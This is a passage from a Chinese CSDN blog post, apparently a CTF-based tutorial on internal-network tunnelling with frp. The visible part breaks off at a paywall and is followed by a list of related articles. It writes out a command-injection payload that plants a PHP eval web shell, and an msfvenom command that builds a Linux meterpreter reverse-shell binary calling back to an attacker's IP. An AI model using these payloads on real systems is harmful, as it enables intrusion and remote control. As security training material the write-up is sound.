【原创】内网穿透案例

万天峰

已于 2023-10-11 17:51:46 修改

阅读量165

点赞数

分类专栏：安全 web安全网络安全文章标签： linux 服务器网络

于 2023-03-16 20:20:55 首次发布

本文链接：https://blog.csdn.net/text2204/article/details/129598018

版权

本文详细介绍了两个内网穿透案例，包括使用Frp进行内网访问和扫描，以及CFS三层内网漫游的渗透过程。涉及到frp转发、制作Linux后门、添加路由、socks代理、nmap扫描等关键步骤，适用于网络安全学习者提升技能。

摘要由CSDN通过智能技术生成

案列一（Frp内网渗透）

大概图列网上随便找的，路线是这个样子

这里选用ctfshow的一道命令执行题

由Frp实现内网访问及扫描

点击此处即可无偿领取282G网络安全学习资料

1.传入一句话，上线蚁剑

http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=`echo '<?php eval(\$_POST[1]);?>' > 1.php`;

2.进行frp转发

先服务器启动

./frps -c frps.ini

然后再kali启动

./frpc -c frpc.ini

3.制作linux马上线msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=公网ip LPORT=6000 -f  elf > shell.elf

直接拖进去并更改权限

kali开启监听

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

万天峰

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[zz]TutorABC 董海冰：Golang ＋ WebRTC 搭建实时音视频云实践

突围

03-28

4584

5G来临，我们该如何打造自己的家庭数据中心 - 基础篇

ABC实验室的博客

04-14

5206

首先，我们这里所指的家挺数据中心概念，既不是指成千上万台服务器的大规模互联网数据中心，也不是大家所说的有几十台或上百台服务器的电信机房，我们这里所说的家庭数据中心，更多的目标在于“家用”，对家庭进行数字化并对其数据进行系统管理和利用。网上也有家庭数据中心的这个提法，更多集中在数据存储和媒体中心的功能上。这篇文章也将数据存储为家庭数据平台的核心，但会以家庭数字化升级为目标，来做做进一步的扩充和增强。

参与评论您还未登录，请先登录后发表或查看评论

frp 内网穿透 多系统多模式（详细+多个应用）

ziqibit的博客

03-13

2万+

frp内网穿透的跨平台，多模式（包括点对点）的超详细教程，可直接复制使用

补发&frp内网穿透(socks隧道)

最新发布

2301_76227305的博客

03-07

1028

ok啊兄弟们，也是成功解决这个问题了。最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

kali中用proxychains代理后的nmap扫描问题

隐身博客

12-19

1024

注意：nmap扫描过程中，由于网络连接的不稳定性，可能会导致代理服务器连接中断。如果遇到连接中断的情况，可以尝试重新启动代理服务器或更换其他可用的代理服务器。启动代理服务器：根据你使用的代理服务器不同，启动代理服务器。常用的代理工具有SOCKS代理如SS5、Shadowsocks等。是你所使用的代理服务器的端口号。是nmap扫描选项，

使用msfvenom实现远程控制.

2301_78457119的博客

06-24

761

在Kali 2中生成被控端的工具：msfvenom（msfvenom是渗透测试工具Metasploit中的一个命令）1、查看帮助信息、查2.看所有可以使用的攻击模块3、筛选出使用reverse_tcp的模块。

Frp 内网穿透服务器在渗透中的应用

weixin_46035615的博客

05-08

1397

内容实战-在内网发布服务使之可在公网访问使用 frp 搭建内网穿透服务器 实战-kali 配置 MSF 接收来自公网的 shell 实战-跨网段获取内网 shell 实战-内网穿透-二级代理实战-内网穿透-三级代理

Ms08067红队学员 “红蓝实战对抗”报告

Ms08067安全实验室

12-23

844

MS08067红队攻防从第二期班开始增加了“实战对抗”环节，为了模拟真实环境将采用两个不同的云服务提供商搭建真实环境，将同学分为AB两队，一攻一守，实现既有攻击也要有防御更要有反制的全面内...

3D音乐爱心相册

jackee_yang的博客

05-16

584

前言马上就是520了，作为一名程序员，当然要用程序员的方式啦。用代码去爱她，所以笔者思前想后，于是有了下列想法：要花里胡哨，看了惊呼我的天，色彩要绚丽要打动人心，肯定要酷炫，所以要动才有特色好的东西肯定要有美丽的音乐来加分兄弟们看完记得点个赞，让更多看见，造福广大单身的程序员，谁说我们是直男，我们也很浪漫，话不多说，上才艺（项目地址在最后，代码太多只展示部分，用于修改的代码）一、来个花里胡哨的背景我本来想找个流星的动图，不太理想，于是就使用了这个css库 css-doodle 这个库可以让

十分钟教你配置frp实现内网穿透

热门推荐

诗雨远方的博客

11-30

45万+

十分钟教你配置frp实现内网穿透 一、frp的作用利用处于内网或防火墙后的机器，对外网环境提供 http 或 https 服务。对于 http, https 服务支持基于域名的虚拟主机，支持自定义域名绑定，使多个域名可以共用一个80端口。利用处于内网或防火墙后的机器，对外网环境提供 tcp 和 udp 服务，例如在家里通过 ssh 访问处于公司内网环境内的主机。二、配置说明 1、...

利用frp实现内网穿透，超级简单使用

weixin_45775077的博客

03-15

1360

frp内网穿透步骤： 1、下载对应系统的frp应用（linux，windows） 2、服务器只需要解压，配置，启动（linux） 3、客户端也是解压，配置，启动（windows） 4、浏览器访问公网ip或域名成功内网穿透 一、下载frp应用下载地址是https://github.com/fatedier/frp/releases 例如（linux）：wget https://github.c...

作为内网杀手的metasploit如何在外网使用呢？

qq284489030的博客

05-09

5213

经常使用metsploit的同学可能会有疑问，为啥我只能在同一局域网里面进行渗透主机呢？这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么？这里我给大家普及一下吧！经常使用metsploit的同学可能会有疑问，为啥我只能在同一局域网里面进行渗透主机呢？…… 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么？这里我给大家普及一下吧！什么是内网?内网接入方...

msfvenom的使用&免杀&外网渗透

`or 1 or 不正经の泡泡

03-13

6104

msfvenom的基本使用这玩意是啥我就不介绍了,懂得都懂. 这篇博客将结合我本人的自身经验来说明大致的使用方式,这里的话只介绍,目前比较常用的几个方法和参数. payload 查看与使用 payload你可以理解为就是一种攻击的方案,生成何种攻击方式,对那种平台进行攻击使用参数 -p来进行设置, 查看为-l payload具体的看如下案例 encoders的使用参数 -e 这个是指选择何种方式编码,提高木马免杀的概率,此外还有参数 -i -b 不过有本人亲测使用-e即可,甚至不用指定,原因是无论你

使用frp配置内网访问（穿透）教程（超详细，简单）

Lisen’s blog

10-24

21万+

1 Frp介绍 frp 是一个开源、简洁易用、高性能的内网穿透和反向代理软件，支持 tcp, udp, http, https等协议。frp 项目官网是 https://github.com/fatedier/frp， frp工作原理服务端运行，监听一个主端口，等待客户端的连接；客户端连接到服务端的主端口，同时告诉服务端要监听的端口和转发类型；服务端fork新的进程监听客户端指定的端口；外网用户连接到客户端指定的端口，服务端通过和客户端的连接将数据转发到客户端；客户端进程再将数据转发到本地服务，

frp内网穿透工具安装和详解

qq_41248529的博客

05-10

3474

有些api的调用或者联调需要公网IP才能进行，这样一来不得不将代码部署到服务器进行访问，这样做是比较繁琐和麻烦的，所以实际开发过程中，一般是购买内网映射工具（比如花生壳），这样花费成本比较高。如果我们购买了一台带有公网的ip地址，比如阿里云，搭建一个开源的内网穿透工具，将固定的ip映射到转发到本地，是不是可以节省很多成本，而且也方便本地联调。关于正向代理和反向代理原理一搜一大把，个人建议大家了...

隧道技术 Frp 多层内网穿透

Love&Share

12-21

4570

文章目录Frp穿透Frp多层内网实战实验环境操作第一层隧道第二层隧道 Frp穿透项目地址：https://github.com/fatedier/frp 中文文档：https://gofrp.org/docs/ frp 是一个可用于内网穿透的高性能的全平台反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网 frp 采用 Golang 编写，支持跨平台，仅需下载对应平台的二进制文件即可执行，没有额外依赖 F.

利用FRP实现内网穿透

Movle

06-12

715

情况：自己有两台电脑，一台16G内存的Dell，和一台8G内存的MacBook Pro，因为自己学的是大数据开发，所以需要搭建大数据集群，因此在MacBook Pro开发的话内存太小了，既要用虚拟机搭建大数据集群，又要用IDEA开发的话，内存是肯定不够的，所以之前是在Dell上面创建虚拟机，搭建大数据集群，然后再在MacBook Pro上开发，因为虚拟机使用的桥接法上网，Macbook Pro和Dell又在同一个局域网里，所以还可以，但是如果需要离开，区别的地方的话，自己就需要带两台电脑了，太沉了，所以.

内网穿透工具---frp使用教程

u011215939的博客

12-04

3万+

前言最近在研究内网渗透的一些东西，碰到了需要内网穿透的情况，使用了几款工具后，就来总结一下啦。介绍frp frp 是一个可用于内网穿透的高性能的反向代理应用，支持 tcp, udp, http, https 协议。 1、利用处于内网或防火墙后的机器，对外网环境提供 http 或 https 服务。 2、对于 http, https 服务支持基于域名的虚拟主机，支持自定义域名绑定，使多个域名可...

腾讯云如何实现本地内网穿透案例

03-14

腾讯云提供了多种本地内网穿透的解决方案，包括端口映射、VPN、云联网等。其中，端口映射是最常用的一种方式，可以通过将本地的端口映射到公网上的端口，实现内网穿透。具体实现方法可以参考腾讯云的官方文档或者...